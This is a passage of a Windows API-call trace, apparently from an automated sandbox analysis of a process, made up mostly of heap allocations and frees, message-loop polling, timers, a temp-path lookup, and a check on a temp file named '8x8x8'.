Size=0x10) returned 0x2e51e08 [0291.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0291.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0291.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0291.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0291.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0291.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0291.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0291.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0291.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0291.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0291.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0291.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0291.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0291.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0291.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0291.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0291.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0291.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0291.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0291.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0291.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0291.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0291.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0291.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0291.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0291.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0291.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0291.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0291.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0291.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0291.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0291.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0291.119] FreeLibrary (hLibModule=0x750c0000) returned 1 [0291.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0291.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0291.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0291.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0291.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0291.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0291.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0291.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0291.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0291.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0291.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0291.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0291.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0291.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0291.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0291.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0291.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0291.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0291.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0291.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0291.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0291.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0291.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0291.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0291.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0291.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0291.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0291.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0291.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0291.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0291.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f146b0 [0291.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0291.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0291.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f148d8 | out: hHeap=0x970000) returned 1 [0291.121] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0291.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0291.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0291.121] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0291.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0291.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0291.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0291.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0291.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0291.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0291.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0291.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0291.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0291.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0291.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0291.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0291.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0291.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0291.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0291.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0291.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0291.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0291.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0291.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0291.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0291.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0291.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0291.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0291.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0291.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0291.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0291.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0291.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f146b0 | out: hHeap=0x970000) returned 1 [0291.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0291.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0291.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0291.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0291.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0291.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0291.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0291.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0291.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0291.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0291.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0291.122] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0291.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0291.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0291.122] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0291.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0291.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0291.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0291.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0291.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0291.123] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf3c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0291.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0291.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0291.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0291.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0291.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0291.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0291.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0291.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0291.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0291.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0291.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0291.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0291.123] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0291.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0291.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0291.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0291.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0291.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0291.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0291.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0291.124] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0291.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0291.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0291.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0291.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0291.124] timeGetTime () returned 0x1188dd9 [0291.124] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0291.124] Sleep (dwMilliseconds=0xa) [0291.208] timeGetTime () returned 0x1188e2d [0291.208] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0291.208] Sleep (dwMilliseconds=0xa) [0291.277] timeGetTime () returned 0x1188e72 [0291.277] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0291.277] Sleep (dwMilliseconds=0xa) [0291.349] timeGetTime () returned 0x1188eba [0291.349] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0291.349] TranslateMessage (lpMsg=0x8cf798) returned 0 [0291.349] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0291.349] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0291.349] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0291.349] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0291.349] Sleep (dwMilliseconds=0xa) [0291.533] timeGetTime () returned 0x1188f72 [0291.533] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0291.533] Sleep (dwMilliseconds=0xa) [0291.616] timeGetTime () returned 0x1188fc5 [0291.616] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0291.616] Sleep (dwMilliseconds=0xa) [0291.693] timeGetTime () returned 0x1189012 [0291.693] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0291.693] Sleep (dwMilliseconds=0xa) [0291.730] timeGetTime () returned 0x1189037 [0291.730] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0291.730] Sleep (dwMilliseconds=0xa) [0291.765] timeGetTime () returned 0x118905a [0291.765] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0291.765] Sleep (dwMilliseconds=0xa) [0291.804] timeGetTime () returned 0x1189081 [0291.804] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0291.804] Sleep (dwMilliseconds=0xa) [0291.838] timeGetTime () returned 0x11890a3 [0291.838] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0291.838] Sleep (dwMilliseconds=0xa) [0291.885] timeGetTime () returned 0x11890d2 [0291.885] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0291.886] Sleep (dwMilliseconds=0xa) [0291.922] timeGetTime () returned 0x11890f8 [0291.922] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0291.922] Sleep (dwMilliseconds=0xa) [0291.962] timeGetTime () returned 0x118911f [0291.962] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0291.962] Sleep (dwMilliseconds=0xa) [0292.018] timeGetTime () returned 0x1189157 [0292.018] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0292.018] Sleep (dwMilliseconds=0xa) [0292.077] timeGetTime () returned 0x1189192 [0292.077] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0292.077] Sleep (dwMilliseconds=0xa) [0292.154] timeGetTime () returned 0x11891df [0292.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0292.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0292.154] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0292.156] TranslateMessage (lpMsg=0x8cf968) returned 0 [0292.156] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0292.157] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0292.157] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0292.157] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0292.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0292.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0292.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0292.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0292.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0292.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0292.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0292.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0292.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0292.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0292.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0292.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0292.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0292.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0292.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0292.158] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0292.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0292.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0292.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0292.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0292.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0292.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0292.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0292.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0292.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0292.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0292.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0292.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0292.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0292.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0292.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0292.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0292.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0292.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0292.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0292.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0292.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0292.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0292.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0292.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0292.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0292.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0292.159] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") 